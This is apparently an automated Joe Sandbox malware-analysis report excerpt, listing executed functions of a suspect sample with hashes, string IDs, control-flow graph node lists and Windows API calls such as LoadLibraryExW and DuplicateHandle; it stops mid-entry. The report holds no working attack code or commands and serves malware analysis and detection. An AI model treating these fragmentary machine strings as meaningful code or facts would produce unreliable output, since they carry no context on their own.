                      • Source File: 00000008.00000002.1867482898.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_62c0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                      • API String ID: 0-3823777903
                      • Opcode ID: f3d9f466813ee6a394319588f0859c1635369260d099bc4550466b703bee5cae
                      • Instruction ID: 0f25a9b5e54089bad149ba033c5f6a2833ead9804541cb8a69935e5a314d8fb6
                      • Opcode Fuzzy Hash: f3d9f466813ee6a394319588f0859c1635369260d099bc4550466b703bee5cae
                      • Instruction Fuzzy Hash: F9B1A130B20245CFDB55DB69C8549AEBBF6BF85210B14856ED806CB3A5CF76DC42CB90

                      Execution Graph

                      Execution Coverage:8.3%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:51
                      Total number of Limit Nodes:1
                      execution_graph 27232 99b090 27236 99b188 27232->27236 27244 99b178 27232->27244 27233 99b09f 27237 99b1bc 27236->27237 27238 99b199 27236->27238 27237->27233 27238->27237 27252 99b410 27238->27252 27256 99b420 27238->27256 27239 99b1b4 27239->27237 27240 99b3c0 GetModuleHandleW 27239->27240 27241 99b3ed 27240->27241 27241->27233 27245 99b199 27244->27245 27246 99b1bc 27244->27246 27245->27246 27250 99b410 LoadLibraryExW 27245->27250 27251 99b420 LoadLibraryExW 27245->27251 27246->27233 27247 99b1b4 27247->27246 27248 99b3c0 GetModuleHandleW 27247->27248 27249 99b3ed 27248->27249 27249->27233 27250->27247 27251->27247 27253 99b415 27252->27253 27255 99b459 27253->27255 27260 99aea8 27253->27260 27255->27239 27258 99b434 27256->27258 27257 99b459 27257->27239 27258->27257 27259 99aea8 LoadLibraryExW 27258->27259 27259->27257 27261 99b600 LoadLibraryExW 27260->27261 27263 99b679 27261->27263 27263->27255 27264 994a30 27265 994a39 27264->27265 27266 994a3f 27265->27266 27268 994b28 27265->27268 27269 994b4d 27268->27269 27273 994c38 27269->27273 27277 994c28 27269->27277 27274 994c5f 27273->27274 27275 994d3c 27274->27275 27281 994800 27274->27281 27278 994c5f 27277->27278 27279 994d3c 27278->27279 27280 994800 CreateActCtxA 27278->27280 27280->27279 27282 995cc8 CreateActCtxA 27281->27282 27284 995d8b 27282->27284 27284->27284 27285 99d420 27286 99d466 27285->27286 27290 99d5ef 27286->27290 27293 99d600 27286->27293 27287 99d553 27296 99b074 27290->27296 27294 99d62e 27293->27294 27295 99b074 DuplicateHandle 27293->27295 27294->27287 27295->27294 27297 99d668 DuplicateHandle 27296->27297 27298 99d62e 27297->27298 27298->27287

                      Executed Functions

                      Function 04BE0F88 Relevance: 33.4, Strings: 26, Instructions: 850COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1841153931.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_4be0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID: fcq$ fcq$ fcq$ fcq$ fcq$ fcq$ fcq$ fcq$ fcq$ fcq$Te^q$Te^q$Te^q$XX^q$XX^q$XX^q$XX^q$XX^q$XX^q$XX^q$XX^q$$^q$$^q$$^q$$^q$$^q
                      • API String ID: 0-3544529763
                      • Opcode ID: 516e4c7cb55e7d0fec1e1b5e8e922fa1ee52c0e50362933a7584c14b402804df
                      • Instruction ID: a3faba14c64f73a68a2369275c122a92a1818c2d5291d14a20daf7ca84d2a5b1
                      • Opcode Fuzzy Hash: 516e4c7cb55e7d0fec1e1b5e8e922fa1ee52c0e50362933a7584c14b402804df
                      • Instruction Fuzzy Hash: FC628C74F04258DFDB14CFAEC444ABDBBB2FB85300F2485A6E442AB295D734AD46CB91
                      Function 04BEA8C8 Relevance: 13.9, Strings: 11, Instructions: 151COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1030 4bea8c8-4bea8f0 1031 4bea928-4bea94d 1030->1031 1032 4bea8f2-4bea8f5 1030->1032 1065 4bea94f 1031->1065 1066 4bea952-4bea95c 1031->1066 1033 4bea8fe-4bea915 1032->1033 1034 4bea8f7 1032->1034 1056 4beaabe-4beaac6 1033->1056 1057 4bea91b-4bea926 1033->1057 1034->1031 1034->1033 1035 4bea9be-4bea9c0 1034->1035 1036 4beaa56-4beaa5f 1034->1036 1037 4beaa07-4beaa0d 1034->1037 1038 4beaa64-4beaa72 1034->1038 1039 4beaa85-4beaa8b 1034->1039 1040 4bea993-4bea99b 1034->1040 1041 4bea9a0-4bea9bc 1034->1041 1048 4bea9de 1035->1048 1049 4bea9c2-4bea9c8 1035->1049 1036->1032 1043 4beaa0f-4beaa11 1037->1043 1044 4beaa13-4beaa1f 1037->1044 1046 4beaa7e-4beaa83 1038->1046 1047 4beaa74 1038->1047 1050 4beaa8f-4beaa9b 1039->1050 1051 4beaa8d 1039->1051 1040->1032 1041->1035 1052 4beaa21-4beaa30 1043->1052 1044->1052 1046->1039 1053 4beaa79 1046->1053 1047->1053 1054 4bea9e0-4beaa02 1048->1054 1058 4bea9ce-4bea9da 1049->1058 1059 4bea9ca-4bea9cc 1049->1059 1060 4beaa9d-4beaaa8 1050->1060 1051->1060 1068 4beaa3a-4beaa44 1052->1068 1053->1032 1054->1032 1057->1032 1064 4bea9dc 1058->1064 1059->1064 1076 4beaaaa-4beaab0 1060->1076 1077 4beaab6-4beaabd 1060->1077 1064->1054 1065->1066 1071 4bea95e-4bea963 1066->1071 1072 4bea965-4bea968 1066->1072 1068->1056 1075 4beaa46-4beaa51 1068->1075 1074 4bea96b-4bea97f 1071->1074 1072->1074 1074->1056 1081 4bea985-4bea98e 1074->1081 1075->1032 1078 4beaab4 1076->1078 1079 4beaab2 1076->1079 1078->1077 1079->1077 1081->1032
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1841153931.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_4be0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8bq$8bq$LR^q$LR^q$LR^q$LR^q$$^q$$^q$$^q$$^q$$^q
                      • API String ID: 0-384795450
                      • Opcode ID: 94f5f83b5812c838e0d16b137bc5bf3fb6f46a8e39544208575a0ab5f92b35be
                      • Instruction ID: 58c04ac87467640dc9c8bbcac5a4cc39c94b3abdc824f22ee6ceaca2a2889bb3
                      • Opcode Fuzzy Hash: 94f5f83b5812c838e0d16b137bc5bf3fb6f46a8e39544208575a0ab5f92b35be
                      • Instruction Fuzzy Hash: 5351C334F40219CFDB148F5AC90467EB7F9FBC8700F1184AAE115EB291EB74AC829B51
                      Function 04BE144F Relevance: 10.2, Strings: 8, Instructions: 191COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1841153931.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_4be0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID: fcq$ fcq$Te^q$XX^q$$^q$$^q$$^q$$^q
                      • API String ID: 0-3622600923
                      • Opcode ID: fc17d13db1ba8d32d68d50d5ef3eb88f52bd4e71545774f5bfa1bcf7e57435c6
                      • Instruction ID: 7ce00f02d12d1e6c2b7919492678daed5c5aec0aa4dea1fe0d99bffba53fc594
                      • Opcode Fuzzy Hash: fc17d13db1ba8d32d68d50d5ef3eb88f52bd4e71545774f5bfa1bcf7e57435c6
                      • Instruction Fuzzy Hash: 7671F7B4F04218DFDB198E9EC544ABDB7B2EBC0711F7484A6E502AB294D734AC81DF81
                      Function 04BEA8B8 Relevance: 3.9, Strings: 3, Instructions: 135COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1235 4bea8b8-4bea8f0 1236 4bea928-4bea94d 1235->1236 1239 4bea94f 1236->1239 1240 4bea952-4bea95c 1236->1240 1239->1240 1241 4bea95e-4bea963 1240->1241 1242 4bea965-4bea968 1240->1242 1243 4bea96b-4bea97f 1241->1243 1242->1243 1245 4beaabe-4beaac6 1243->1245 1246 4bea985-4bea98e 1243->1246 1247 4bea8f2-4bea8f5 1246->1247 1248 4bea8fe-4bea915 1247->1248 1249 4bea8f7 1247->1249 1248->1245 1271 4bea91b-4bea926 1248->1271 1249->1236 1249->1248 1251 4bea9be-4bea9c0 1249->1251 1252 4beaa56-4beaa5f 1249->1252 1253 4beaa07-4beaa0d 1249->1253 1254 4beaa64-4beaa72 1249->1254 1255 4beaa85-4beaa8b 1249->1255 1256 4bea993-4bea99b 1249->1256 1257 4bea9a0-4bea9bc 1249->1257 1263 4bea9de 1251->1263 1264 4bea9c2-4bea9c8 1251->1264 1252->1247 1258 4beaa0f-4beaa11 1253->1258 1259 4beaa13-4beaa1f 1253->1259 1261 4beaa7e-4beaa83 1254->1261 1262 4beaa74 1254->1262 1265 4beaa8f-4beaa9b 1255->1265 1266 4beaa8d 1255->1266 1256->1247 1257->1251 1267 4beaa21-4beaa30 1258->1267 1259->1267 1261->1255 1268 4beaa79 1261->1268 1262->1268 1269 4bea9e0-4beaa02 1263->1269 1272 4bea9ce-4bea9da 1264->1272 1273 4bea9ca-4bea9cc 1264->1273 1274 4beaa9d-4beaaa8 1265->1274 1266->1274 1279 4beaa3a-4beaa44 1267->1279 1268->1247 1269->1247 1271->1247 1277 4bea9dc 1272->1277 1273->1277 1283 4beaaaa-4beaab0 1274->1283 1284 4beaab6-4beaabd 1274->1284 1277->1269 1279->1245 1282 4beaa46-4beaa51 1279->1282 1282->1247 1285 4beaab4 1283->1285 1286 4beaab2 1283->1286 1285->1284 1286->1284
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1841153931.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_4be0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID: LR^q$$^q$$^q
                      • API String ID: 0-3333519130
                      • Opcode ID: e430f250e2af714f236a92c51f0d398be9def76a694b165dc86de2fb349c0811
                      • Instruction ID: 8e81eaeb114d4839b9da9ba8cc75e88e1d0882c0260f71d3489240959ea98dbe
                      • Opcode Fuzzy Hash: e430f250e2af714f236a92c51f0d398be9def76a694b165dc86de2fb349c0811
                      • Instruction Fuzzy Hash: F8410374F44209CFDB148F9AC944ABDB7F9FBDC700F0180A6E115AB292E770AC829B51
                      Function 0099B188 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1309 99b188-99b197 1310 99b199-99b1a6 call 99ae40 1309->1310 1311 99b1c3-99b1c7 1309->1311 1318 99b1a8 1310->1318 1319 99b1bc 1310->1319 1312 99b1c9-99b1d3 1311->1312 1313 99b1db-99b21c 1311->1313 1312->1313 1320 99b229-99b237 1313->1320 1321 99b21e-99b226 1313->1321 1366 99b1ae call 99b410 1318->1366 1367 99b1ae call 99b420 1318->1367 1319->1311 1323 99b239-99b23e 1320->1323 1324 99b25b-99b25d 1320->1324 1321->1320 1322 99b1b4-99b1b6 1322->1319 1325 99b2f8-99b3b8 1322->1325 1327 99b249 1323->1327 1328 99b240-99b247 call 99ae4c 1323->1328 1326 99b260-99b267 1324->1326 1359 99b3ba-99b3bd 1325->1359 1360 99b3c0-99b3eb GetModuleHandleW 1325->1360 1330 99b269-99b271 1326->1330 1331 99b274-99b27b 1326->1331 1329 99b24b-99b259 1327->1329 1328->1329 1329->1326 1330->1331 1334 99b288-99b291 call 99ae5c 1331->1334 1335 99b27d-99b285 1331->1335 1340 99b29e-99b2a3 1334->1340 1341 99b293-99b29b 1334->1341 1335->1334 1342 99b2c1-99b2c5 1340->1342 1343 99b2a5-99b2ac 1340->1343 1341->1340 1364 99b2c8 call 99b6f0 1342->1364 1365 99b2c8 call 99b720 1342->1365 1343->1342 1345 99b2ae-99b2be call 99ae6c call 99ae7c 1343->1345 1345->1342 1347 99b2cb-99b2ce 1350 99b2f1-99b2f7 1347->1350 1351 99b2d0-99b2ee 1347->1351 1351->1350 1359->1360 1361 99b3ed-99b3f3 1360->1361 1362 99b3f4-99b408 1360->1362 1361->1362 1364->1347 1365->1347 1366->1322 1367->1322
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0099B3DE
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1837044243.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_990000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 3f6c514f672a7d0ce332901cf6ddecfef15519ad741a845abf5838e83a433f61
                      • Instruction ID: 70a72c24a1a4b41302d9f07b40732a1d641956283d8d638e96c371bb8a5e1617
                      • Opcode Fuzzy Hash: 3f6c514f672a7d0ce332901cf6ddecfef15519ad741a845abf5838e83a433f61
                      • Instruction Fuzzy Hash: F9713470A00B058FDB24DF6AE54575ABBF5FF88300F008A2DD49ADBA50DB79E945CB90
                      Function 0099B068 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1368 99b068-99b070 1370 99b072-99b07b 1368->1370 1371 99b0a4-99b0aa 1368->1371 1370->1371 1372 99d668-99d6fc DuplicateHandle 1370->1372 1373 99b0ac-99b0b0 1371->1373 1374 99b0f0-99b0fb 1371->1374 1378 99d6fe-99d704 1372->1378 1379 99d705-99d722 1372->1379 1376 99b0b2-99b0df 1373->1376 1377 99b0e7-99b0ee 1373->1377 1375 99b108-99b111 1374->1375 1380 99b113-99b117 1375->1380 1381 99b157-99b162 1375->1381 1376->1377 1377->1374 1382 99b0fd-99b105 1377->1382 1378->1379 1384 99b119-99b146 1380->1384 1385 99b14e-99b155 1380->1385 1387 99b16f-99b174 1381->1387 1382->1375 1384->1385 1385->1381 1389 99b164-99b16c 1385->1389 1389->1387
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0099D62E,?,?,?,?,?), ref: 0099D6EF
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1837044243.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_990000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: c83bd4ac9d4d5d46eea49faf57ec893ead33acb11f6b13c781dc4d361839a8fe
                      • Instruction ID: 0b36f2ba04ecf2838588d1649e432ab58385fb25bc6a808e67c3912ad4ca9a37
                      • Opcode Fuzzy Hash: c83bd4ac9d4d5d46eea49faf57ec893ead33acb11f6b13c781dc4d361839a8fe
                      • Instruction Fuzzy Hash: 0551ABB0900748DFDB11CF69D58479ABBF5FF04304F14886EE155AB261C3BAE946CBA4
                      Function 00994800 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1393 994800-995d89 CreateActCtxA 1396 995d8b-995d91 1393->1396 1397 995d92-995dec 1393->1397 1396->1397 1404 995dfb-995dff 1397->1404 1405 995dee-995df1 1397->1405 1406 995e01-995e0d 1404->1406 1407 995e10 1404->1407 1405->1404 1406->1407 1408 995e11 1407->1408 1408->1408
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 00995D79
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1837044243.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_990000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: 096f57ede06eb30be0a609024c88fc59cbd12994d8b29e5698f0c0867a579d6e
                      • Instruction ID: af71712d22ef1d343e90adfe4f81a1dd40e4a9df34738e5cdd5ac424ba7e6e52
                      • Opcode Fuzzy Hash: 096f57ede06eb30be0a609024c88fc59cbd12994d8b29e5698f0c0867a579d6e
                      • Instruction Fuzzy Hash: F841BFB0C00B1DCFDB24DFA9C844B9EBBB5BF49304F24806AD408AB265DB756946CF91
                      Function 00995CBC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1410 995cbc-995cbf 1411 995ccc-995d89 CreateActCtxA 1410->1411 1413 995d8b-995d91 1411->1413 1414 995d92-995dec 1411->1414 1413->1414 1421 995dfb-995dff 1414->1421 1422 995dee-995df1 1414->1422 1423 995e01-995e0d 1421->1423 1424 995e10 1421->1424 1422->1421 1423->1424 1425 995e11 1424->1425 1425->1425
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 00995D79
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1837044243.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_990000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: 0a4950abb08f7d6923095f0901d69d110a657a0e73e8cde8bbdd5083f3ddba0c
                      • Instruction ID: e9ff9a6af9bb656fda7b0f0905d06c59b3fd9bfa19de285e34a88c23dbb1ef0a
                      • Opcode Fuzzy Hash: 0a4950abb08f7d6923095f0901d69d110a657a0e73e8cde8bbdd5083f3ddba0c
                      • Instruction Fuzzy Hash: D441C1B0C00B19CFDB25DFA9C84479EBBB5BF49304F24806AD408AB2A5DB756946CF91
                      Function 0099B074 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1427 99b074-99d6fc DuplicateHandle 1429 99d6fe-99d704 1427->1429 1430 99d705-99d722 1427->1430 1429->1430
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0099D62E,?,?,?,?,?), ref: 0099D6EF
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1837044243.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_990000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: 708a6d24ac21e8b5df9df5936e30f7f4b48854cae2d7905171a108d8bcc423fb
                      • Instruction ID: a35b7476000eb949559f850d9f7a036ad63bd28680ec9153987bd7c8b89be16e
                      • Opcode Fuzzy Hash: 708a6d24ac21e8b5df9df5936e30f7f4b48854cae2d7905171a108d8bcc423fb
                      • Instruction Fuzzy Hash: 6C21E5B59013489FDB10CF9AD584ADEFBF8EB48310F14841AE918B7350D378A950CFA4
                      Function 0099D660 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1433 99d660-99d6fc DuplicateHandle 1434 99d6fe-99d704 1433->1434 1435 99d705-99d722 1433->1435 1434->1435
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0099D62E,?,?,?,?,?), ref: 0099D6EF
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1837044243.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_990000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: 35acd1932313eb4829cfeb3ea79142a6de4ac0a2cf45a3c61699928d94fb6ba6
                      • Instruction ID: e88ea8847514205cf492a2626564df9e16b880956772952a742ae7752002b5a8
                      • Opcode Fuzzy Hash: 35acd1932313eb4829cfeb3ea79142a6de4ac0a2cf45a3c61699928d94fb6ba6
                      • Instruction Fuzzy Hash: C42116B59002589FDB10CF99D484ADEFFF4FB48310F14841AE918A7350D378A944CFA4
                      Function 0099AEA8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1438 99aea8-99b640 1440 99b648-99b677 LoadLibraryExW 1438->1440 1441 99b642-99b645 1438->1441 1442 99b679-99b67f 1440->1442 1443 99b680-99b69d 1440->1443 1441->1440 1442->1443
                      APIs
                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0099B459,00000800,00000000,00000000), ref: 0099B66A
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1837044243.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_990000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 0de4e4120200f4406a4b5997cb9cb7d78804c260d7236858bc48998ec354abb5
                      • Instruction ID: 8fcbc236225993f32bc8f24dbcd474c19abc96b37ba22255770bcdc0f146b6e3
                      • Opcode Fuzzy Hash: 0de4e4120200f4406a4b5997cb9cb7d78804c260d7236858bc48998ec354abb5
                      • Instruction Fuzzy Hash: 591129B59003089FDB10CF9AD544BDEFBF4EB48720F14842AD415B7210C379A945CFA4
                      Function 0099B5F8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1446 99b5f8-99b640 1447 99b648-99b677 LoadLibraryExW 1446->1447 1448 99b642-99b645 1446->1448 1449 99b679-99b67f 1447->1449 1450 99b680-99b69d 1447->1450 1448->1447 1449->1450
                      APIs
                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0099B459,00000800,00000000,00000000), ref: 0099B66A
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1837044243.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_990000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 5c060af3ef8bb1e9ca64c235de41f0c282240d547646e68a253c69b7cc68d5a1
                      • Instruction ID: 828b880167b353be04377923ae0b7b6504db6742924cc4770033ad312bb24825
                      • Opcode Fuzzy Hash: 5c060af3ef8bb1e9ca64c235de41f0c282240d547646e68a253c69b7cc68d5a1
                      • Instruction Fuzzy Hash: 381144B28003488FCB10CF9AD844ADEFBF8EB88320F10842ED459B7210C379A545CFA4
                      Function 0099B378 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1453 99b378-99b3b8 1454 99b3ba-99b3bd 1453->1454 1455 99b3c0-99b3eb GetModuleHandleW 1453->1455 1454->1455 1456 99b3ed-99b3f3 1455->1456 1457 99b3f4-99b408 1455->1457 1456->1457
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0099B3DE
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1837044243.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_990000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: d2cd2fc0af2aa1b20836e89542f34535cba7e3703c7effda00aae32bfd8d5378
                      • Instruction ID: 928bee68c014a9fc216849160e17a7bcf4a1c70bfee744ffd76cdbfc4a89195c
                      • Opcode Fuzzy Hash: d2cd2fc0af2aa1b20836e89542f34535cba7e3703c7effda00aae32bfd8d5378
                      • Instruction Fuzzy Hash: BF110FB5C003498FCB10CF9AD944ADEFBF8AB88324F10842AD829A7210C379A545CFA5
                      Function 04BEB0F8 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1841153931.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_4be0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8bq
                      • API String ID: 0-187764589
                      • Opcode ID: d16a883ab8435a13d08f08a167e456b47e4ec9b76325db5e96488f96ea1c1e2c
                      • Instruction ID: b510f5a318f0d2cfdb2d656726e53979317c2ebb19d88e9b4a93b70ef0c330b0
                      • Opcode Fuzzy Hash: d16a883ab8435a13d08f08a167e456b47e4ec9b76325db5e96488f96ea1c1e2c
                      • Instruction Fuzzy Hash: D821B070B18205DFDB14CE6AD845B7A77A1EBC4321F1004A9E206D7288DB76BE508B96
                      Function 04BEB0E9 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1841153931.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_4be0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8bq
                      • API String ID: 0-187764589
                      • Opcode ID: beb91d69baff0650787bf2e191f4f1678abd88baad7ae8679710fd0c153e695d
                      • Instruction ID: c988043729e4009830245aa303be31b4f78f19424b1d2f105c0599b9e1eec080
                      • Opcode Fuzzy Hash: beb91d69baff0650787bf2e191f4f1678abd88baad7ae8679710fd0c153e695d
                      • Instruction Fuzzy Hash: 1521E070B18205CFDB04CEAA984577A77A1EBC4321F1004AAD202EB298D776BE508B92
                      Function 04BE0DC4 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1841153931.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_4be0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID: Te^q
                      • API String ID: 0-671973202
                      • Opcode ID: 5bdfb2f7fc2352af5fcd493f7bfd8c82df47fb5357288743ab5dd6980f2a0849
                      • Instruction ID: 08faa24c31ebc56c822442ba7bf0102557afd7e7e4f7bb4fd51df9e0f2d6c03d
                      • Opcode Fuzzy Hash: 5bdfb2f7fc2352af5fcd493f7bfd8c82df47fb5357288743ab5dd6980f2a0849
                      • Instruction Fuzzy Hash: 53113031B0020A8BCB54EBB999506FEB6F6EBC5310B10546AD905E7244EB32DD16D792
                      Function 04BE0006 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1841153931.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_4be0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID: V
                      • API String ID: 0-1342839628
                      • Opcode ID: 5cb00f2410232c0dc9af740e08f194d37bff58f8480e25eb502d5af9c1fc5655
                      • Instruction ID: cac095ae804f605c07949edac25f896a2a3423bd2d9eb2635b0d8585ed638bbd
                      • Opcode Fuzzy Hash: 5cb00f2410232c0dc9af740e08f194d37bff58f8480e25eb502d5af9c1fc5655
                      • Instruction Fuzzy Hash: C1219F7064DB804FE7229B74C8657867FF0AB46308F05458ED5EA4F2D3C7BA28498B51
                      Function 04BED568 Relevance: .2, Instructions: 193COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1841153931.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_4be0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 814b7e9c0da75a06d82f95d1e1be6b23f429eb8fe11957d0008bd67c69d79fdd
                      • Instruction ID: 2d5f6ce281aca1a88b4ca507add11addbc52112119d844a03af617448fc44536
                      • Opcode Fuzzy Hash: 814b7e9c0da75a06d82f95d1e1be6b23f429eb8fe11957d0008bd67c69d79fdd
                      • Instruction Fuzzy Hash: 6B61E2B1B05246CFC7108F6AC8447BABBB5EB81704F1585FAD11A8F291E7B1EC85C751
                      Function 04BE9FE0 Relevance: .2, Instructions: 176COMMON
                      Download Yara Rule
                      Memory Dump Source
